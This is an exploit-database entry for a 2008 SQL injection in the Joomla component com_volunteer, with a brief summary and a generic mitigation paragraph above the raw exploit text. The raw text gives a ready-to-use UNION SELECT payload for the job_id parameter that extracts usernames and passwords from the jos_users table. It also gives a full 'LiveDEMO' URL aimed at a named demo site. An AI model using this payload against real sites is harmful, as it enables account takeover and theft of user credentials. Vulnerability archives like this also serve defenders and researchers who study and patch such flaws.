header-logo
Suggest Exploit
vendor:
Joomla Component com_volunteer
by:
boom3rang
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla Component com_volunteer
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Joomla Component com_volunteer(job_id) SQL-injection

The Joomla component com_volunteer is vulnerable to SQL injection. An attacker can exploit this vulnerability by manipulating the job_id parameter in the URL to execute arbitrary SQL queries. This can lead to unauthorized access, data leakage, and potential remote code execution.

Mitigation:

The vendor should release a patch that properly sanitizes user input in the job_id parameter. In the meantime, users should ensure they are running the latest version of Joomla and follow secure coding practices to prevent SQL injection vulnerabilities.
Source

Exploit-DB raw data:

#############################################################
Joomla Component com_volunteer(job_id) SQL-injection
#############################################################


###################################################
#[~] Author  :   boom3rang 
#[~] Site    :   www.khg-crew.ws
#[~] Greetz  :   H!tm@N, KHG, chs, redc00de, pr0xy-ki11er, LiTTle-Hack3r, L1RIDON1.
----------------------------------------
#[!] <name>Volunteer</name>
#[!] <creationDate>05.04.2007</creationDate>
#[!] <author>John Pan</author>
#[!] <authorEmail>johnpanq@sina.com</authorEmail>
#[!] <version>2.0</version>
###################################################

Example:
http://localhost/Path/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=[exploit]

Exploit:
-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--

LiveDEMO:
http://demolegacy.joomlaapps.com/index.php?option=com_volunteer&task=jobs&act=jobshow&Itemid=29&orgs_id=3&job_id=-9999+union+all+select+concat(username,char(58),password),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users--&filter=&city_id=&function_id=&limit=5&pageno=1

##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2008-12-22]